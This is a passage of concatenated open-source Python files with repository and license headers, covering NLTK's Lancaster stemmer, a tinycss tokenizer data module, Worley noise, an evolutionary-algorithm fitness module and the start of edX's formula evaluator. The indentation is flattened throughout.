'Yang ', # 0xf9
'Yan ', # 0xfa
'Heng ', # 0xfb
'Xuan ', # 0xfc
'Ge ', # 0xfd
'Nuo ', # 0xfe
'Qi ', # 0xff
)
| gpl-2.0 |
sivu22/nltk-on-gae | GAE/nltk/stem/lancaster.py | 5 | 11216 | # Natural Language Toolkit: Stemmers
#
# Copyright (C) 2001-2012 NLTK Project
# Author: Steven Tomcavage <stomcava@law.upenn.edu>
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
"""
A word stemmer based on the Lancaster stemming algorithm.
Paice, Chris D. "Another Stemmer." ACM SIGIR Forum 24.3 (1990): 56-61.
"""
import re
from api import StemmerI
class LancasterStemmer(StemmerI):
"""
Lancaster Stemmer
>>> from nltk.stem.lancaster import LancasterStemmer
>>> st = LancasterStemmer()
>>> st.stem('maximum') # Remove "-um" when word is intact
'maxim'
>>> st.stem('presumably') # Don't remove "-um" when word is not intact
'presum'
>>> st.stem('multiply') # No action taken if word ends with "-ply"
'multiply'
>>> st.stem('provision') # Replace "-sion" with "-j" to trigger "j" set of rules
'provid'
>>> st.stem('owed') # Word starting with vowel must contain at least 2 letters
'ow'
>>> st.stem('ear') # ditto
'ear'
>>> st.stem('saying') # Words starting with consonant must contain at least 3
'say'
>>> st.stem('crying') # letters and one of those letters must be a vowel
'cry'
>>> st.stem('string') # ditto
'string'
>>> st.stem('meant') # ditto
'meant'
>>> st.stem('cement') # ditto
'cem'
"""
# The rule list is static since it doesn't change between instances
rule_tuple = (
"ai*2.", # -ia > - if intact
"a*1.", # -a > - if intact
"bb1.", # -bb > -b
"city3s.", # -ytic > -ys
"ci2>", # -ic > -
"cn1t>", # -nc > -nt
"dd1.", # -dd > -d
"dei3y>", # -ied > -y
"deec2ss.", # -ceed >", -cess
"dee1.", # -eed > -ee
"de2>", # -ed > -
"dooh4>", # -hood > -
"e1>", # -e > -
"feil1v.", # -lief > -liev
"fi2>", # -if > -
"gni3>", # -ing > -
"gai3y.", # -iag > -y
"ga2>", # -ag > -
"gg1.", # -gg > -g
"ht*2.", # -th > - if intact
"hsiug5ct.", # -guish > -ct
"hsi3>", # -ish > -
"i*1.", # -i > - if intact
"i1y>", # -i > -y
"ji1d.", # -ij > -id -- see nois4j> & vis3j>
"juf1s.", # -fuj > -fus
"ju1d.", # -uj > -ud
"jo1d.", # -oj > -od
"jeh1r.", # -hej > -her
"jrev1t.", # -verj > -vert
"jsim2t.", # -misj > -mit
"jn1d.", # -nj > -nd
"j1s.", # -j > -s
"lbaifi6.", # -ifiabl > -
"lbai4y.", # -iabl > -y
"lba3>", # -abl > -
"lbi3.", # -ibl > -
"lib2l>", # -bil > -bl
"lc1.", # -cl > c
"lufi4y.", # -iful > -y
"luf3>", # -ful > -
"lu2.", # -ul > -
"lai3>", # -ial > -
"lau3>", # -ual > -
"la2>", # -al > -
"ll1.", # -ll > -l
"mui3.", # -ium > -
"mu*2.", # -um > - if intact
"msi3>", # -ism > -
"mm1.", # -mm > -m
"nois4j>", # -sion > -j
"noix4ct.", # -xion > -ct
"noi3>", # -ion > -
"nai3>", # -ian > -
"na2>", # -an > -
"nee0.", # protect -een
"ne2>", # -en > -
"nn1.", # -nn > -n
"pihs4>", # -ship > -
"pp1.", # -pp > -p
"re2>", # -er > -
"rae0.", # protect -ear
"ra2.", # -ar > -
"ro2>", # -or > -
"ru2>", # -ur > -
"rr1.", # -rr > -r
"rt1>", # -tr > -t
"rei3y>", # -ier > -y
"sei3y>", # -ies > -y
"sis2.", # -sis > -s
"si2>", # -is > -
"ssen4>", # -ness > -
"ss0.", # protect -ss
"suo3>", # -ous > -
"su*2.", # -us > - if intact
"s*1>", # -s > - if intact
"s0.", # -s > -s
"tacilp4y.", # -plicat > -ply
"ta2>", # -at > -
"tnem4>", # -ment > -
"tne3>", # -ent > -
"tna3>", # -ant > -
"tpir2b.", # -ript > -rib
"tpro2b.", # -orpt > -orb
"tcud1.", # -duct > -duc
"tpmus2.", # -sumpt > -sum
"tpec2iv.", # -cept > -ceiv
"tulo2v.", # -olut > -olv
"tsis0.", # protect -sist
"tsi3>", # -ist > -
"tt1.", # -tt > -t
"uqi3.", # -iqu > -
"ugo1.", # -ogu > -og
"vis3j>", # -siv > -j
"vie0.", # protect -eiv
"vi2>", # -iv > -
"ylb1>", # -bly > -bl
"yli3y>", # -ily > -y
"ylp0.", # protect -ply
"yl2>", # -ly > -
"ygo1.", # -ogy > -og
"yhp1.", # -phy > -ph
"ymo1.", # -omy > -om
"ypo1.", # -opy > -op
"yti3>", # -ity > -
"yte3>", # -ety > -
"ytl2.", # -lty > -l
"yrtsi5.", # -istry > -
"yra3>", # -ary > -
"yro3>", # -ory > -
"yfi3.", # -ify > -
"ycn2t>", # -ncy > -nt
"yca3>", # -acy > -
"zi2>", # -iz > -
"zy1s." # -yz > -ys
)
def __init__(self):
"""Create an instance of the Lancaster stemmer.
"""
# Setup an empty rule dictionary - this will be filled in later
self.rule_dictionary = {}
def parseRules(self, rule_tuple):
"""Validate the set of rules used in this stemmer.
"""
valid_rule = re.compile("^[a-z]+\*?\d[a-z]*[>\.]?$")
# Empty any old rules from the rule set before adding new ones
self.rule_dictionary = {}
for rule in rule_tuple:
if not valid_rule.match(rule):
raise ValueError("The rule %s is invalid" % rule)
first_letter = rule[0:1]
if first_letter in self.rule_dictionary:
self.rule_dictionary[first_letter].append(rule)
else:
self.rule_dictionary[first_letter] = [rule]
def stem(self, word):
"""Stem a word using the Lancaster stemmer.
"""
# Lower-case the word, since all the rules are lower-cased
word = word.lower()
# Save a copy of the original word
intact_word = word
# If the user hasn't supplied any rules, setup the default rules
if len(self.rule_dictionary) == 0:
self.parseRules(LancasterStemmer.rule_tuple)
return self.__doStemming(word, intact_word)
def __doStemming(self, word, intact_word):
"""Perform the actual word stemming
"""
valid_rule = re.compile("^([a-z]+)(\*?)(\d)([a-z]*)([>\.]?)$")
proceed = True
while proceed:
# Find the position of the last letter of the word to be stemmed
last_letter_position = self.__getLastLetter(word)
# Only stem the word if it has a last letter and a rule matching that last letter
if last_letter_position < 0 or word[last_letter_position] not in self.rule_dictionary:
proceed = False
else:
rule_was_applied = False
# Go through each rule that matches the word's final letter
for rule in self.rule_dictionary[word[last_letter_position]]:
rule_match = valid_rule.match(rule)
if rule_match:
(ending_string,
intact_flag,
remove_total,
append_string,
cont_flag) = rule_match.groups()
# Convert the number of chars to remove when stemming
# from a string to an integer
remove_total = int(remove_total)
# Proceed if word's ending matches rule's word ending
if word.endswith(ending_string[::-1]):
if intact_flag:
if (word == intact_word and
self.__isAcceptable(word, remove_total)):
word = self.__applyRule(word,
remove_total,
append_string)
rule_was_applied = True
if cont_flag == '.':
proceed = False
break
elif self.__isAcceptable(word, remove_total):
word = self.__applyRule(word,
remove_total,
append_string)
rule_was_applied = True
if cont_flag == '.':
proceed = False
break
# If no rules apply, the word doesn't need any more stemming
if rule_was_applied == False:
proceed = False
return word
def __getLastLetter(self, word):
"""Get the zero-based index of the last alphabetic character in this string
"""
last_letter = -1
for position in range(len(word)):
if word[position].isalpha():
last_letter = position
else:
break
return last_letter
def __isAcceptable(self, word, remove_total):
"""Determine if the word is acceptable for stemming.
"""
word_is_acceptable = False
# If the word starts with a vowel, it must be at least 2
# characters long to be stemmed
if word[0] in "aeiouy":
if (len(word) - remove_total >= 2):
word_is_acceptable = True
# If the word starts with a consonant, it must be at least 3
# characters long (including one vowel) to be stemmed
elif (len(word) - remove_total >= 3):
if word[1] in "aeiouy":
word_is_acceptable = True
elif word[2] in "aeiouy":
word_is_acceptable = True
return word_is_acceptable
def __applyRule(self, word, remove_total, append_string):
"""Apply the stemming rule to the word
"""
# Remove letters from the end of the word
new_word_length = len(word) - remove_total
word = word[0:new_word_length]
# And add new letters to the end of the truncated word
if append_string:
word += append_string
return word
def __repr__(self):
return '<LancasterStemmer>'
if __name__ == "__main__":
import doctest
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
| apache-2.0 |
user-none/calibre | src/tinycss/token_data.py | 19 | 13497 | # coding: utf8
"""
tinycss.token_data
------------------
Shared data for both implementations (Cython and Python) of the tokenizer.
:copyright: (c) 2012 by Simon Sapin.
:license: BSD, see LICENSE for more details.
"""
from __future__ import unicode_literals
import re
import sys
import operator
import functools
import string
# * Raw strings with the r'' notation are used so that \ do not need
# to be escaped.
# * Names and regexps are separated by a tabulation.
# * Macros are re-ordered so that only previous definitions are needed.
# * {} are used for macro substitution with ``string.Formatter``,
# so other uses of { or } have been doubled.
# * The syntax is otherwise compatible with re.compile.
# * Some parentheses were added to add capturing groups.
# (in unicode, DIMENSION and URI)
# *** Willful violation: ***
# Numbers can take a + or - sign, but the sign is a separate DELIM token.
# Since comments are allowed anywhere between tokens, this makes
# the following valid. It means 10 negative pixels:
# margin-top: -/**/10px
# This makes parsing numbers a pain, so instead we’ll do the same as Firefox
# and make the sign part of the 'num' macro. The above CSS will be invalid.
# See discussion:
# http://lists.w3.org/Archives/Public/www-style/2011Oct/0028.html
MACROS = r'''
nl \n|\r\n|\r|\f
w [ \t\r\n\f]*
nonascii [^\0-\237]
unicode \\([0-9a-f]{{1,6}})(\r\n|[ \n\r\t\f])?
simple_escape [^\n\r\f0-9a-f]
escape {unicode}|\\{simple_escape}
nmstart [_a-z]|{nonascii}|{escape}
nmchar [_a-z0-9-]|{nonascii}|{escape}
name {nmchar}+
ident [-]?{nmstart}{nmchar}*
num [-+]?(?:[0-9]*\.[0-9]+|[0-9]+)
string1 \"([^\n\r\f\\"]|\\{nl}|{escape})*\"
string2 \'([^\n\r\f\\']|\\{nl}|{escape})*\'
string {string1}|{string2}
badstring1 \"([^\n\r\f\\"]|\\{nl}|{escape})*\\?
badstring2 \'([^\n\r\f\\']|\\{nl}|{escape})*\\?
badstring {badstring1}|{badstring2}
badcomment1 \/\*[^*]*\*+([^/*][^*]*\*+)*
badcomment2 \/\*[^*]*(\*+[^/*][^*]*)*
badcomment {badcomment1}|{badcomment2}
baduri1 url\({w}([!#$%&*-~]|{nonascii}|{escape})*{w}
baduri2 url\({w}{string}{w}
baduri3 url\({w}{badstring}
baduri {baduri1}|{baduri2}|{baduri3}
'''.replace(r'\0', '\0').replace(r'\237', '\237')
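The `{}`-based macro substitution described in the comments above can be shown with a tiny self-contained example (hypothetical macro names; each macro may only reference macros defined before it, and each expansion is wrapped in a non-capturing group, mirroring what `_init()` does):

```python
import re

macro_lines = [
    ('digit', r'[0-9]'),
    ('num', r'{digit}+'),           # refers to the earlier 'digit' macro
    ('decimal', r'{num}\.{num}'),   # refers to 'num'
]
macros = {}
for name, value in macro_lines:
    # Wrap each expansion in a non-capturing group before reuse.
    macros[name] = '(?:%s)' % value.format(**macros)

assert re.match(macros['decimal'] + '$', '3.14')
assert re.match(macros['decimal'] + '$', '3.') is None
```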
# Removed these tokens. Instead, they’re tokenized as two DELIM each.
# INCLUDES ~=
# DASHMATCH |=
# They are only used in selectors but selectors3 also have ^=, *= and $=.
# We don’t actually parse selectors anyway
# Re-ordered so that the longest match is always the first.
# For example, "url('foo')" matches URI, BAD_URI, FUNCTION and IDENT,
# but URI would always be a longer match than the others.
TOKENS = r'''
S [ \t\r\n\f]+
URI url\({w}({string}|([!#$%&*-\[\]-~]|{nonascii}|{escape})*){w}\)
BAD_URI {baduri}
FUNCTION {ident}\(
UNICODE-RANGE u\+[0-9a-f?]{{1,6}}(-[0-9a-f]{{1,6}})?
IDENT {ident}
ATKEYWORD @{ident}
HASH #{name}
DIMENSION ({num})({ident})
PERCENTAGE {num}%
NUMBER {num}
STRING {string}
BAD_STRING {badstring}
COMMENT \/\*[^*]*\*+([^/*][^*]*\*+)*\/
BAD_COMMENT {badcomment}
: :
; ;
{ \{{
} \}}
( \(
) \)
[ \[
] \]
CDO <!--
CDC -->
'''
# Strings with {macro} expanded
COMPILED_MACROS = {}
COMPILED_TOKEN_REGEXPS = [] # [(name, regexp.match)] ordered
COMPILED_TOKEN_INDEXES = {} # {name: i} helper for the C speedups
# Indexed by codepoint value of the first character of a token.
# Codepoints >= 160 (aka nonascii) all use the index 160.
# values are (i, name, regexp.match)
TOKEN_DISPATCH = []
try:
unichr
except NameError:
# Python 3
unichr = chr
unicode = str
def _init():
"""Import-time initialization."""
COMPILED_MACROS.clear()
for line in MACROS.splitlines():
if line.strip():
name, value = line.split('\t')
COMPILED_MACROS[name.strip()] = '(?:%s)' \
% value.format(**COMPILED_MACROS)
COMPILED_TOKEN_REGEXPS[:] = (
(
name.strip(),
re.compile(
value.format(**COMPILED_MACROS),
# Case-insensitive when matching eg. uRL(foo)
# but preserve the case in extracted groups
re.I
).match
)
for line in TOKENS.splitlines()
if line.strip()
for name, value in [line.split('\t')]
)
COMPILED_TOKEN_INDEXES.clear()
for i, (name, regexp) in enumerate(COMPILED_TOKEN_REGEXPS):
COMPILED_TOKEN_INDEXES[name] = i
dispatch = [[] for i in range(161)]
for chars, names in [
(' \t\r\n\f', ['S']),
('uU', ['URI', 'BAD_URI', 'UNICODE-RANGE']),
# \ is an escape outside of another token
(string.ascii_letters + '\\_-' + unichr(160), ['FUNCTION', 'IDENT']),
(string.digits + '.+-', ['DIMENSION', 'PERCENTAGE', 'NUMBER']),
('@', ['ATKEYWORD']),
('#', ['HASH']),
('\'"', ['STRING', 'BAD_STRING']),
('/', ['COMMENT', 'BAD_COMMENT']),
('<', ['CDO']),
('-', ['CDC']),
]:
for char in chars:
dispatch[ord(char)].extend(names)
for char in ':;{}()[]':
dispatch[ord(char)] = [char]
TOKEN_DISPATCH[:] = (
[
(index,) + COMPILED_TOKEN_REGEXPS[index]
for name in names
for index in [COMPILED_TOKEN_INDEXES[name]]
]
for names in dispatch
)
_init()
def _unicode_replace(match, int=int, unichr=unichr, maxunicode=sys.maxunicode):
codepoint = int(match.group(1), 16)
if codepoint <= maxunicode:
return unichr(codepoint)
else:
return '\N{REPLACEMENT CHARACTER}' # U+FFFD
UNICODE_UNESCAPE = functools.partial(
re.compile(COMPILED_MACROS['unicode'], re.I).sub,
_unicode_replace)
NEWLINE_UNESCAPE = functools.partial(
re.compile(r'()\\' + COMPILED_MACROS['nl']).sub,
'')
SIMPLE_UNESCAPE = functools.partial(
re.compile(r'\\(%s)' % COMPILED_MACROS['simple_escape'] , re.I).sub,
# Same as r'\1', but faster on CPython
operator.methodcaller('group', 1))
FIND_NEWLINES = lambda x : list(re.compile(COMPILED_MACROS['nl']).finditer(x))
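As a rough standalone sketch of what `UNICODE_UNESCAPE` does — replacing a `\` escape of 1-6 hex digits (plus an optional terminating whitespace character) with the character it encodes, falling back to U+FFFD for out-of-range codepoints (Python 3 `chr` used here instead of the module's `unichr` shim):

```python
import re
import sys

def unicode_unescape_sketch(css_text):
    """Resolve CSS unicode escapes such as '\\41 ' -> 'A'."""
    unicode_escape = re.compile(r'\\([0-9a-f]{1,6})(?:\r\n|[ \n\r\t\f])?', re.I)
    def replace(match):
        codepoint = int(match.group(1), 16)
        if codepoint <= sys.maxunicode:
            return chr(codepoint)
        return '\N{REPLACEMENT CHARACTER}'  # U+FFFD
    return unicode_escape.sub(replace, css_text)

assert unicode_unescape_sketch('\\41 BC') == 'ABC'
assert unicode_unescape_sketch('\\26 B\\26 D') == '&B&D'
```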
class Token(object):
"""A single atomic token.
.. attribute:: is_container
Always ``False``.
Helps to tell :class:`Token` apart from :class:`ContainerToken`.
.. attribute:: type
The type of token as a string:
``S``
A sequence of white space
``IDENT``
An identifier: a name that does not start with a digit.
A name is a sequence of letters, digits, ``_``, ``-``, escaped
characters and non-ASCII characters. Eg: ``margin-left``
``HASH``
``#`` followed immediately by a name. Eg: ``#ff8800``
``ATKEYWORD``
``@`` followed immediately by an identifier. Eg: ``@page``
``URI``
Eg: ``url(foo)`` The content may or may not be quoted.
``UNICODE-RANGE``
``U+`` followed by one or two hexadecimal
Unicode codepoints. Eg: ``U+20-00FF``
``INTEGER``
An integer with an optional ``+`` or ``-`` sign
``NUMBER``
A non-integer number with an optional ``+`` or ``-`` sign
``DIMENSION``
An integer or number followed immediately by an
identifier (the unit). Eg: ``12px``
``PERCENTAGE``
An integer or number followed immediately by ``%``
``STRING``
A string, quoted with ``"`` or ``'``
``:`` or ``;``
That character.
``DELIM``
A single character not matched in another token. Eg: ``,``
See the source of the :mod:`.token_data` module for the precise
regular expressions that match various tokens.
Note that other token types exist in the early tokenization steps,
but these are ignored, are syntax errors, or are later transformed
into :class:`ContainerToken` or :class:`FunctionToken`.
.. attribute:: value
The parsed value:
* INTEGER, NUMBER, PERCENTAGE or DIMENSION tokens: the numeric value
as an int or float.
* STRING tokens: the unescaped string without quotes
* URI tokens: the unescaped URI without quotes or
``url(`` and ``)`` markers.
* IDENT, ATKEYWORD or HASH tokens: the unescaped token,
with ``@`` or ``#`` markers left as-is
* Other tokens: same as :attr:`as_css`
*Unescaped* refers to the various escaping methods based on the
backslash ``\`` character in CSS syntax.
.. attribute:: unit
* DIMENSION tokens: the normalized (unescaped, lower-case)
unit name as a string. eg. ``'px'``
* PERCENTAGE tokens: the string ``'%'``
* Other tokens: ``None``
.. attribute:: line
The line number in the CSS source of the start of this token.
.. attribute:: column
The column number (inside a source line) of the start of this token.
"""
is_container = False
__slots__ = 'type', '_as_css', 'value', 'unit', 'line', 'column'
def __init__(self, type_, css_value, value, unit, line, column):
self.type = type_
self._as_css = css_value
self.value = value
self.unit = unit
self.line = line
self.column = column
def as_css(self):
"""
Return as a Unicode string the CSS representation of the token,
as parsed in the source.
"""
return self._as_css
def __repr__(self):
return ('<Token {0.type} at {0.line}:{0.column} {0.value!r}{1}>'
.format(self, self.unit or ''))
class ContainerToken(object):
"""A token that contains other (nested) tokens.
.. attribute:: is_container
Always ``True``.
Helps to tell :class:`ContainerToken` apart from :class:`Token`.
.. attribute:: type
The type of token as a string. One of ``{``, ``(``, ``[`` or
``FUNCTION``. For ``FUNCTION``, the object is actually a
:class:`FunctionToken`.
.. attribute:: unit
Always ``None``. Included to make :class:`ContainerToken` behave
more like :class:`Token`.
.. attribute:: content
A list of :class:`Token` or nested :class:`ContainerToken`,
not including the opening or closing token.
.. attribute:: line
The line number in the CSS source of the start of this token.
.. attribute:: column
The column number (inside a source line) of the start of this token.
"""
is_container = True
unit = None
__slots__ = 'type', '_css_start', '_css_end', 'content', 'line', 'column'
def __init__(self, type_, css_start, css_end, content, line, column):
self.type = type_
self._css_start = css_start
self._css_end = css_end
self.content = content
self.line = line
self.column = column
def as_css(self):
"""
Return as a Unicode string the CSS representation of the token,
as parsed in the source.
"""
parts = [self._css_start]
parts.extend(token.as_css() for token in self.content)
parts.append(self._css_end)
return ''.join(parts)
format_string = '<ContainerToken {0.type} at {0.line}:{0.column}>'
def __repr__(self):
return (self.format_string + ' {0.content}').format(self)
class FunctionToken(ContainerToken):
"""A specialized :class:`ContainerToken` for a ``FUNCTION`` group.
Has an additional attribute:
.. attribute:: function_name
The unescaped name of the function, with the ``(`` marker removed.
"""
__slots__ = 'function_name',
def __init__(self, type_, css_start, css_end, function_name, content,
line, column):
super(FunctionToken, self).__init__(
type_, css_start, css_end, content, line, column)
# Remove the ( marker:
self.function_name = function_name[:-1]
format_string = ('<FunctionToken {0.function_name}() at '
'{0.line}:{0.column}>')
class TokenList(list):
"""
A mixed list of :class:`~.token_data.Token` and
:class:`~.token_data.ContainerToken` objects.
This is a subclass of the builtin :class:`~builtins.list` type.
It can be iterated, indexed and sliced as usual, but also has some
additional API:
"""
@property
def line(self):
"""The line number in the CSS source of the first token."""
return self[0].line
@property
def column(self):
"""The column number (inside a source line) of the first token."""
return self[0].column
def as_css(self):
"""
Return as a Unicode string the CSS representation of the tokens,
as parsed in the source.
"""
return ''.join(token.as_css() for token in self)
def load_c_tokenizer():
from calibre.constants import plugins
tokenizer, err = plugins['tokenizer']
if err:
raise RuntimeError('Failed to load module tokenizer: %s' % err)
tokens = list(':;(){}[]') + ['DELIM', 'INTEGER', 'STRING']
tokenizer.init(COMPILED_TOKEN_REGEXPS, UNICODE_UNESCAPE, NEWLINE_UNESCAPE, SIMPLE_UNESCAPE, FIND_NEWLINES, TOKEN_DISPATCH, COMPILED_TOKEN_INDEXES, *tokens)
return tokenizer
| gpl-3.0 |
yohei-washizaki/perlin | worley_noise.py | 1 | 1680 | #!/usr/bin/env python3
import math
def calc_sqr_distance(a, b):
vx = a[0] - b[0]
vy = a[1] - b[1]
return vx * vx + vy * vy
def find_nearest_distance(uv, max_size, random_points):
xf, xi = math.modf(uv[0])
yf, yi = math.modf(uv[1])
min_sqr_distance = float("inf")
for y_offset in [-1, 0, 1]:
for x_offset in [-1, 0, 1]:
x = int((xi + x_offset + max_size) % max_size)
y = int((yi + y_offset + max_size) % max_size)
idx = int(x * max_size + y)
p = random_points[idx]
other = (x_offset + xi + p[0],
y_offset + yi + p[1])
sqr_distance = calc_sqr_distance(uv, other)
if sqr_distance < min_sqr_distance:
min_sqr_distance = sqr_distance
return math.sqrt(min_sqr_distance)
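Stripped of the cell grid and toroidal wrapping, the essence of `find_nearest_distance` — the Worley value at a point is its distance to the nearest feature point — reduces to a brute-force search (hypothetical helper, for illustration only):

```python
import math

def worley_brute_force(uv, feature_points):
    """Distance from uv to the nearest feature point, no acceleration."""
    def sqr_distance(a, b):
        vx, vy = a[0] - b[0], a[1] - b[1]
        return vx * vx + vy * vy
    return math.sqrt(min(sqr_distance(uv, p) for p in feature_points))

assert worley_brute_force((0.0, 1.0), [(0.0, 0.0), (3.0, 4.0)]) == 1.0
```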
if __name__ == "__main__":
import argparse
import random
from random_point import gen_random_points
from uv import gen_uv
parser = argparse.ArgumentParser()
parser.add_argument("size", type=int, help="size of a texture. power of 2")
parser.add_argument("-r", "--random_seed", type=int, help="random seed")
parser.add_argument("-s", "--scale_factor", type=float, default=1.0, help="scale factor")
args = parser.parse_args()
scale_factor = args.scale_factor
random.seed(args.random_seed)
random_points = gen_random_points(int(scale_factor*scale_factor), 1.0, random)
uvs = gen_uv(args.size, args.size, scale_factor)
for uv in uvs:
nearest_distance = find_nearest_distance(uv, scale_factor, random_points)
print(nearest_distance)
| mit |
sondree/Master-thesis | Python EA/ea/fitness.py | 1 | 7716 | #!/usr/bin/python
from config import GLOBAL_SECTION
from utility import select_class, degToRad
FITNESS_SECTION = 'Fitness'
from math import pi,log, sqrt
def parse_config(config):
classes = [('HeurFitness', HeurFitness),('GPUFitness', GPUFitness),('ProjectFitness', ProjectFitness),('DummyFitness',DummyFitness)]
clazz = config.get(FITNESS_SECTION, 'class')
c = select_class(clazz, classes)
if c != None:
return c(config)
else:
raise NameError("Could not find the fitness class: {0}".format(clazz))
class DummyFitness(object):
def __init__(self,configuration):
pass
def calc_fitness(self,population):
for i in population:
t = (100.0*100.0-float(i.get_value()**2))/(100.0*100.0)
i.set_fitness(t)
return population
class BasicFitness(object):
def __init__(self, config):
self.grid = self.__parse_grid(config)
self.step_size = self.__parse_step_size(config)
self.num_trials = self.__parse_num_trials(config)
self.seed = self.__parse_seed(config)
self.noise_stddev = self.__parse_noise(config)
self.emitter_position = self.__parse_emitter_position(config)
def __parse_noise(self,config):
b = config.getfloat(FITNESS_SECTION, 'noise_stddev')
return b
def __parse_emitter_position(self,config):
x = config.getfloat(FITNESS_SECTION, 'emitter_pos_x')
y = config.getfloat(FITNESS_SECTION, 'emitter_pos_y')
return (x,y)
def __parse_grid(self, config):
x = config.getint(FITNESS_SECTION, 'grid_x')
y = config.getint(FITNESS_SECTION, 'grid_y')
return (x, y)
def __parse_step_size(self, config):
return config.getint(FITNESS_SECTION, 'step_size')
def __parse_num_trials(self, config):
return config.getint(FITNESS_SECTION, 'num_trials')
def __parse_seed(self, config):
return config.getint(GLOBAL_SECTION, 'seed')
class GPUFitness(BasicFitness):
def __init__(self,config):
super(GPUFitness,self).__init__(config)
self.mode = self.__parse_mode(config)
def __parse_mode(self,config):
mode = config.getint(FITNESS_SECTION, "mode")
return mode
def calc_gpu(self, receiver_positions):
from nllsCuda import pyMultipleFitness
#def pyFitness(receiverPositions, emitterPosition, numTrials, noiseStdDev, numSteps, gridMax):
vals = pyMultipleFitness(receiver_positions,self.emitter_position, self.num_trials,self.noise_stddev, self.step_size, self.grid)
return vals
def calc_fitness(self, population):
vals = self.calc_gpu(map(lambda pheno: pheno.get_position(), population))
for i, (fit, avg_dev, max_dev, min_dev, variance, abs_bias) in enumerate(vals):
population[i].set_statistics(avg_dev, max_dev, min_dev, variance, abs_bias)
if self.mode == 0:
for i, (fit, avg_dev, max_dev, min_dev, variance, abs_bias) in enumerate(vals):
population[i].set_fitness(100.0/(1.0+avg_dev))
elif self.mode == 1:
for i, (fit, avg_dev, max_dev, min_dev, variance, abs_bias) in enumerate(vals):
population[i].set_fitness(100.0/(1.0+fit*0.0001))
return population
class ProjectFitness(GPUFitness):
def __init__(self,config):
super(ProjectFitness,self).__init__(config)
self.rotate_degrees = self.__parse_rotate(config)
def __parse_rotate(self, config):
try:
return config.getint(FITNESS_SECTION, 'rotate_step_degrees')
except:
return None
def calc_fitness(self, population):
results = [0] * len(population)
num_steps = int(360/self.rotate_degrees)
assert num_steps * self.rotate_degrees == 360, "Rotation degrees should make an even rotation"
rotate_radians = degToRad(self.rotate_degrees)
for step in range(num_steps):
map(lambda pheno: pheno.rotate(rotate_radians*step), population.get_phenos())
vals = self.calc_gpu(map(lambda pheno: pheno.get_position(), population))
for x in range(len(population)):
results[x] += vals[x][0]
norm_value = 950*num_steps #sqrt(self.grid[0]**2 +self.grid[1]**2)*num_steps
for i, val in enumerate(results):
#fit = 100.0*(1-(val/norm_value))
fit = 100.0/(1.0+val*0.0001)
#print val, norm_value, fit
population[i].set_fitness(fit)
return population
class HeurFitness(BasicFitness):
def __init__(self,config):
super(HeurFitness,self).__init__(config)
self.base_position = self.__parse_base_position(config)
self.num_simulations = self.__parse_num_simulations(config)
self.num_receivers = self.__parse_num_receivers(config)
def __parse_base_position(self,config):
x = config.getint(FITNESS_SECTION, "base_pos_x")
y = config.getint(FITNESS_SECTION, "base_pos_y")
return (x,y)
def __parse_num_simulations(self,config):
n = config.getint(FITNESS_SECTION, "num_simulations")
return n
def __parse_num_receivers(self,config):
n = config.getint(GLOBAL_SECTION, "num_receivers")
return n
def make_uav_positions(self, num_receivers, base_position, angles):
from fitness_heuristics import make_receiver
from utility import degToRad
uavPositions = []
for i, angle in enumerate(angles):
rads = degToRad(angle)
uavPositions.append(make_receiver(self.base_position,rads,50))
return uavPositions
def calc_gpu(self, receiver_positions):
from nllsCuda import pyMultipleFitness
#def pyFitness(receiverPositions, emitterPosition, numTrials, noiseStdDev, numSteps, gridMax):
vals = pyMultipleFitness(receiver_positions,self.emitter_position, 100,self.noise_stddev, self.step_size, self.grid)
return vals
def calc_fitness(self,population):
from fitness_heuristics import simulate
from heuristics.AttractionAgent import AttractionAgent
from random import getstate, setstate
import numpy as np
state = getstate()
for i,individ in enumerate(population):
heuristics_params = individ.get_heur_params()
uav_positions = self.make_uav_positions(self.num_receivers,self.base_position, heuristics_params[1:])
position_sets = []
steps = []
for t in xrange(self.num_simulations):
setstate(state)
samplesUsed, samplePositions = simulate(self.num_trials, self.grid, self.emitter_position, self.noise_stddev, uav_positions, AttractionAgent, heuristics_params, 8)
position_sets.append(samplePositions)
steps.append(samplesUsed)
vals = self.calc_gpu(position_sets)
fits = []
for i, (fit, avg_dev, max_dev, min_dev, variance, abs_bias) in enumerate(vals):
fits.append(fit)
fits = np.array(fits)
fit_avg = fits.sum()/len(fits)
steps = np.array(steps)
steps_avg = steps.sum()/len(steps)
individ.set_fitness(100.0/(1.0+fit_avg*0.0001))
print heuristics_params, fit_avg, steps_avg, 100.0/(1.0+fit_avg*0.0001)
return population
| gpl-3.0 |
xiandiancloud/edx-platform | common/lib/calc/calc/calc.py | 61 | 13558 | """
Parser and evaluator for FormulaResponse and NumericalResponse
Uses pyparsing to parse. Main function as of now is evaluator().
"""
import math
import operator
import numbers
import numpy
import scipy.constants
import functions
from pyparsing import (
Word, Literal, CaselessLiteral, ZeroOrMore, MatchFirst, Optional, Forward,
Group, ParseResults, stringEnd, Suppress, Combine, alphas, nums, alphanums
)
DEFAULT_FUNCTIONS = {
'sin': numpy.sin,
'cos': numpy.cos,
'tan': numpy.tan,
'sec': functions.sec,
'csc': functions.csc,
'cot': functions.cot,
'sqrt': numpy.sqrt,
'log10': numpy.log10,
'log2': numpy.log2,
'ln': numpy.log,
'exp': numpy.exp,
'arccos': numpy.arccos,
'arcsin': numpy.arcsin,
'arctan': numpy.arctan,
'arcsec': functions.arcsec,
'arccsc': functions.arccsc,
'arccot': functions.arccot,
'abs': numpy.abs,
'fact': math.factorial,
'factorial': math.factorial,
'sinh': numpy.sinh,
'cosh': numpy.cosh,
'tanh': numpy.tanh,
'sech': functions.sech,
'csch': functions.csch,
'coth': functions.coth,
'arcsinh': numpy.arcsinh,
'arccosh': numpy.arccosh,
'arctanh': numpy.arctanh,
'arcsech': functions.arcsech,
'arccsch': functions.arccsch,
'arccoth': functions.arccoth
}
DEFAULT_VARIABLES = {
'i': numpy.complex(0, 1),
'j': numpy.complex(0, 1),
'e': numpy.e,
'pi': numpy.pi,
'k': scipy.constants.k, # Boltzmann: 1.3806488e-23 (Joules/Kelvin)
'c': scipy.constants.c, # Light Speed: 2.998e8 (m/s)
'T': 298.15, # Typical room temperature: 298.15 (Kelvin), same as 25C/77F
'q': scipy.constants.e # Fund. Charge: 1.602176565e-19 (Coulombs)
}
# We eliminated the following extreme suffixes:
# P (1e15), E (1e18), Z (1e21), Y (1e24),
# f (1e-15), a (1e-18), z (1e-21), y (1e-24)
# since they're rarely used, and potentially confusing.
# They may also conflict with variables if we ever allow e.g.
# 5R instead of 5*R
SUFFIXES = {
